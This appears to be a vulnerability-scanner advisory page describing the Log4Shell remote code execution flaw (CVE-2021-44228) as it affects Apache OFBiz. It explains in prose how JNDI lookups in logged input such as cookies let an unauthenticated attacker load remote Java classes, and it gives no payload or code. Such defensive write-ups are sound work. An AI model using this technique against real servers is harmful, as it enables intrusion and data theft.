Apache OFBiz Remote Code Execution Scanner

Apache OFBiz is an open-source enterprise resource planning (ERP) system used by various companies to manage their business processes, including finance, human resources, and order processing. It is utilized by organizations that require a flexible ERP system due to its modular architecture and comprehensive functionalities. As a server-side application, it allows businesses to scale and manage operations efficiently. Apache OFBiz integrates numerous features that can be customized according to specific needs, making it ideal for mid-sized and large enterprises. Developed by the Apache Foundation, OFBiz benefits from a large community of contributors and developers, ensuring continuous improvement and support. It is widely adopted across various industries for its cost-effectiveness and comprehensive suite of tools.

The Remote Code Execution (RCE) vulnerability detected in Apache OFBiz is caused by a flaw in the Apache Log4j library. The issue arises due to insufficient protections on message lookup substitutions when handling user-controlled input. This vulnerability can be exploited remotely by an unauthenticated attacker who can send a specially crafted request to the server. It allows the attacker to execute arbitrary code on the host machine with the permission level of the running Java process. The severity of this vulnerability is critical, given the potential for unauthorized control over the entire application server. This vulnerability affects all OFBiz versions using vulnerable versions of the Log4j library before specific patches were applied.

In this RCE vulnerability, the attacker can exploit the Apache Log4j component used in Apache OFBiz by using JNDI lookups in log messages to have it fetch remote Java classes, thus potentially executing arbitrary code. The vulnerable endpoint is often a web endpoint accepting user input in loggable fields. A threat actor can manipulate log formats by crafting a malicious payload that triggers the JNDI lookup expression through specific parameters in a web request. This payload can be delivered via HTTP cookies or other input areas logged by OFBiz, leveraging the logging infrastructure's default behavior in the vulnerable Log4j versions.

When this RCE vulnerability is exploited, an attacker could gain control over the affected system, leading to potential breaches, data theft, or further propagation within the network. The consequences of this could include unauthorized access to sensitive data, disruption of business operations, and severe financial liabilities. Moreover, the attacker could use the compromised system as a launch point for attacks against other systems in the network, resulting in a broader security incident. Organizations relying on Apache OFBiz are urged to address this vulnerability promptly to protect their infrastructure.

REFERENCES

• https://issues.apache.org/jira/browse/OFBIZ-12449
• https://ofbiz.apache.org/
• https://logging.apache.org/log4j/2.x/security.html
• https://nvd.nist.gov/vuln/detail/CVE-2021-44228